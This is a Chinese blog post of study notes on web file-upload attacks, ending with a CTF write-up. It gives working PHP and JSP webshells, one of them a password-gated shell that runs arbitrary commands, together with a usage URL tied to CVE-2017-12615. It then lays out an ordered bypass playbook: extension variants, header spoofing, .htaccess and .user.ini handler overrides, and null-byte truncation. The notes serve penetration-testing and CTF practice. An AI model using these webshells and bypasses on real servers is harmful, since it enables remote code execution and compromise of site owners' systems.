upload-文件上传漏洞笔记(思路加绕过)

已于 2023-11-19 23:07:27 修改
阅读量347 收藏
点赞数 4
文章标签: 笔记 web安全 网络安全
于 2023-11-14 20:17:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75361164/article/details/134407068
版权

实例

<?php fputs(fopen('Tony.php','w'),'<?php @eval($_POST["Tony"])?>');?> 条件竞争,访问到会自己生成Tony.php文件 
<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

http://192.168.231.134:8080/5.jsp?pwd=023&i=ls Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)上传后门

upload上传思路:

  1. 先上传图片马(可以绕过JS前端防护和MIME验证)

  2. 之后先直接上传尝试(这里可能会检查文件内容是否有php字符串,<? , 和是否有文件头)

  3. 若有则进行绕过,检查php绕过(短标签绕过):<?=eval($_POST['cmd']);?> <?绕过: 文件头绕过:在文件最前面写入GIF89a

  4. 若没有则进行filename绕过,尝试特殊解析漏洞:php3,php5,phtml ; 大小写绕过:PHP,pHP; 点绕过:php.; 空格绕过:php空格;::$$DATA绕过:`shell.php::$$DATA;双后缀:shell.phphpp;单循环绕过:shell.php. .;假文件名绕过:shell.php/.

    php3
php5
phtml
PHP
PHp
php.
php 
php::$$DATA
phphpp
php. . 
php. .
php . .
php .
php/.

  5. 若没有绕过就可以进行.htaccess绕过和.user.ini绕过,注:如果上传上去导致无法访问文件,请删除GIF89a重试

.htaccess绕过:

GIF89a

<FilesMatch "shell.jpg">

SetHandler application/x-httpd-php

</FilesMatch>

.user.ini绕过:

GIF89a
auto_prepend_file=shell.jpg

注:用蚁剑或菜刀链接实路径的shell.jpg改为index.php

  1. 若这些都不能绕过,则进行白名单绕过,使用0x00截断,0x0a截断。注POST提交时%00要用URL解码或者在Hex里面将值改为00

  2. 若还不行则考虑文件包含漏洞,结合文件包含漏洞进行上传

  3. 若不行则考虑二次渲染绕过(条件竞争绕过)

  4. 最后考虑构造数组进行绕过(数组绕过)

  5. 实际中先看是否有解析漏洞(IIS,Apache,Nginx0),有的话直接绕过就行了

绝对路径拼接漏洞(os.path.join漏洞)

os.path.join(path,*paths)函数用于将多个文件路径连接成一个组合的路径。第一个函数通常包含了基础路径,而之后的每个参数被当作组件拼接到基础路径之后。

然而,这个函数有一个少有人知的特性,如果拼接的某个路径以 / 开头,那么包括基础路径在内的所有前缀路径都将被删除,该路径将视为绝对路径

os.path.join()函数:
第一个以”/”开头的参数开始拼接,之前的参数全部丢弃,当有多个时,从最后一个开始

Apache文件上传漏洞:

  1. 低版本Apache有从右到左开始判断解析,如果右边是不可识别后缀则往左看,如shell.php.123

  2. AddHandler导致的解析漏洞

    如果服务器给.php后缀添加了处理器:AddHandler application/x-httpd-php.php
    那么,在有多个后缀的情况下,只要包含.php后缀的文件就会被识别出php文件进行解析,不需要是最后一个后缀,可绕过白名单过滤,如:shell.php.jpg

  3. Apache换行解析漏洞

函数

finfo_file()和getimagesize()验证文件类型的区别

finfo_file

finfo_file():通过图片的内容头进制分析图片的类型,没有检测文件内容,分析的不太全面
注:这里的内容头,拿png举例:不仅仅是最前面的png,还有别的,如:

在这里插入图片描述

getimagesize

getimagesize():通过文件头和内容,分析的比较全面,返回分析结果,以数组的形式
getimagesize()函数返回图片信息的数组
索引 0 给出的是图像宽度的像素值
索引 1 给出的是图像高度的像素值
索引 2 给出的是图像的类型,返回的是数字,其中1 = GIF,2 = JPG,3 = PNG,4 = SWF,5 = PSD,6 = BMP,7 = TIFF(intel byte order),8 = TIFF(motorola byte order),9 = JPC,10 = JP2,11 = JPX,12 = JB2,13 = SWC,14 = IFF,15 = WBMP,16 = XBM
索引 3 给出的是一个宽度和高度的字符串,可以直接用于 HTML 的 <image> 标签
索引 bits 给出的是图像的每种颜色的位数,二进制格式
索引 channels 给出的是图像的通道值,RGB 图像默认是 3
索引 mime 给出的是图像的 MIME 信息,此信息可以用来在 HTTP Content-type 头信息中发送正确的信息,如: header("Content-type: image/jpeg");

实例:[HarekazeCTF2019]Avatar Uploader 1

文章:[HarekazeCTF2019]Avatar Uploader 1

思路:

1.首先题目给了源码,update.php的有用,毕竟是文件上传
<?php
error_reporting(0);
 
require_once('config.php');
require_once('lib/util.php');
require_once('lib/session.php');
 
$session = new SecureClientSession(CLIENT_SESSION_ID, SECRET_KEY);
 
// check whether file is uploaded
if (!file_exists($_FILES['file']['tmp_name']) || !is_uploaded_file($_FILES['file']['tmp_name'])) {
    error('No file was uploaded.');
}
 
// check file size
if ($_FILES['file']['size'] > 256000) {
    error('Uploaded file is too large.');
}
 
// check file type
$finfo = finfo_open(FILEINFO_MIME_TYPE);//获取文件MIME类型
$type = finfo_file($finfo, $_FILES['file']['tmp_name']);
finfo_close($finfo);
if (!in_array($type, ['image/png'])) {
    error('Uploaded file is not PNG format.');
}
 
// check file width/height
$size = getimagesize($_FILES['file']['tmp_name']);
if ($size[0] > 256 || $size[1] > 256) {
    error('Uploaded image is too large.');
}
if ($size[2] !== IMAGETYPE_PNG) {
    // I hope this never happens...
    error('What happened...? OK, the flag for part 1 is: <code>' . getenv('FLAG1') . '</code>');
}
 
// ok
$filename = bin2hex(random_bytes(4)) . '.png';
move_uploaded_file($_FILES['file']['tmp_name'], UPLOAD_DIR . '/' . $filename);
 
$session->set('avatar', $filename);
flash('info', 'Your avatar has been successfully updated!');
redirect('/');

发现只要finfo_file验证上传的文件为png,并且getimagesize验证的上传文件不为png就可以得到flag

payload

1.利用
finfo_file():通过图片的内容头进制分析图片的类型,没有检测文件内容,分析的不太全面
getimagesize():通过文件头和内容,分析的比较全面,返回分析结果,以数组的形式
这两个函数的特点
2.我们尝试删除png文件的内容,直到getimagesize检测到不是png为止,到最后只剩下了内容头,得到flag

在这里插入图片描述

尘佑不尘
关注
Web基本漏洞--文件上传漏洞_tongweb 默认账户漏洞
2301_82244607的博客
04-29 468
文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者 WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服 务器的处理逻辑做的不够安全,则会导致严重的后果。大厂面试问深度,小厂面试问广度,如果有同学想进大厂深造一定要有一个方向精通的惊艳到面试官,还要平时遇到问题后思考一下问题的本质,找方法解决是一个方面,看到问题本质是另一个方面。
文件上传漏洞upload-labs-master
现代鲁滨逊的博客
11-22 561
关于这个靶场的通关秘籍网上有比我写的更好的,比如:upload-labs-master-文件上传靶场通关笔记我就不详细写了. 文件上传是一个很常见的功能,比如上传图片,视频和其他类型的文件。 文件上传的一般流程: html等前端选择文件,选择本地文件后进行提交 浏览器形成POST MultiPart报文发送到服务器 服务器中间件(如Tomcat、Weblogic等)接收到报文,解析后交给相关的后端代码进行处理 写入到文件中,生成文件名(PHP特有的方法:先生成临时文件,再根据后端代码将临时文件重命名移动到
upload-labs之第十九和二十关以及总结
田田云逸的博客
10-28 1644
Pass19 打开第十九关,发现上传的地方还可以定义上传的文件名 再看看提示 这里说这个文件名是用的post方式传递的,那么看看源码到底要怎么绕过 $is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array("php","php5","php4","php3","php2","html","htm".
upload-labs详解1-19关通关全解(最全最详细一看就会)
热门推荐
qq_53003652的博客
04-05 3万+
upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共19关,每一关都包含着不同上传方式。
Upload-labs 1-21关 靶场通关笔记(含代码审计)
weixin_54894046的博客
10-15 1万+
Upload-labs 1-21关 靶场通关笔记(含代码审计)
[BUU刷题记录]day01-起步
anwen12的博客
12-13 4938
BUU-WEB 这是一个菜鸡的蜕变 先小记录一下题目环境部署必备的docker安装 sudo apt-get remove docker docker-engine docker.io containerd runc sudo apt-get update sudo apt-get install apt-transport-https ca-certificates curl gnupg lsb-release curl -fsSL https://download.docker.com/linux
[Web安全学习] ctfshow-文件上传总结
Y1seco的博客
08-03 705
图片马 <?php eval($_POST[a]);?> 文件后缀修改为jpg,png,gif等,burp修改上传成功后的后缀为.php(或其他根据过滤情况) 利用上传user.ini进行文件上传绕过 user.ini说明: 自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同
WEB漏洞攻防 - 文件上传漏洞 - CTF比赛类应用场景 - [RoarCTF 2024]Simple Upload
最新发布
2401_84009317的博客
04-21 825
现在我们去搜索 “ThinkPHP3.2版本” 开发手册,找到 URL 模块的相关文档,了解 “ThinkPHP3.2版本” 如何通通过 URL 对应的代码关系请求到访问的文件从 “ThinkPHP3.2版本” 开发手册中我们了解到 “PATHINFO模式” 是系统的默认 URL 模式,提供了最好的 SEO 支持,系统内部已经做了环境的兼容处理,所以能够支持大多数的主机环境。PATHINFO地址的前三个参数分别表示模块/控制器/操作。示例:参考上面的 URL 链接模块 --> home控制器 --
文件上传通关笔记upload-writeup)
m0_50800033的博客
01-26 697
前言 一、客户端javascript校验(一般只校验后缀名) 二、服务端校验: 文件头content-type字段校验(image/gif) 文件内容头校验(GIF89a) 后缀名黑名单校验 后缀名白名单校验 自定义正则校验 WAF设备校验(根据不同的WAF产品而定) Pass01 JS 效验 一般都是在网页上写一段javascript脚本,校验上传文件的后缀名,有白名单形式也有黑名单形式。   判断方式:在浏览载文件,但还未点击上传按钮时便弹出对话框,内容如:只允许上传.jpg/.jpeg/.p
upload-labs 学习笔记(五)Pass 17-21
闵行小鱼塘
09-28 513
继续学习upload-labs,本篇是Pass 17-21,至此upload-labs学习告一段落
PHP获取远程图片宽、高
李维山的博客
02-20 497
使用函数 getimagesize: <?php $remote_png_url = 'http://xxx.png'; $img_data = getimagesize($remote_png_url); print_r($img_data); 打印结果如下: Array ( [0] => 290 [1] => 69 [2] => 3 [3] => width="290" height="69" [b
[HarekazeCTF2019]Avatar Uploader 1
snowlyzz的博客
09-14 621
详细讲解 getimagesize函数原理和绕过
getimagesize函数介绍
weixin_30814319的博客
09-17 309
getimagesize(); 返回结果说明 索引 0 给出的是图像宽度的像素值 索引 1 给出的是图像高度的像素值 索引 2 给出的是图像的类型,返回的是数字,其中1 = GIF,2 = JPG,3 = PNG,4 = SWF,5 = PSD,6 = BMP,7 = TIFF(intel byte order),8 = TIFF(motorola byte order),9 = JP...
BUUCTF:[HarekazeCTF2019]Avatar Uploader 1
../../../../../../../
08-19 1305
打开靶机 登录后是一个文件上传界面 题目给了源码,在upload.php中,有两个关键函数,file_info 用来返回一个文件的信息即判断图片上传类型为png,getimagesize 用于获取图像大小及相关信息,并进行再一次类型判断,如果文件类型不为png,即返回flag 因为file_info判断为png,而getimagesize判断结构不能为png,通过了解知道file_info可以识别 png 图片( 十六进制下 )的第一行,而getimagesize 不可以 找一张符合条件的png图片,
BUU刷题记录——4
weixin_43610673的博客
08-31 1924
[HarekazeCTF2019]Avatar Uploader 1 finfo_file用来判断上传图片类型,getimagesize可以判断文件像素大小,并且再进行一次类型判断。 finfo_file函数应该是直接打开文件,来获取文件类型。而getimagesize函数是通过图片尺寸数组中第三个元素是否为int型的3来判断的。 finfo_file 可以识别 png 图片( 十六进制下 )的第一行,而 getimagesize 不可以。 所以我们只要保持png头就可以,将他的相符判断
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值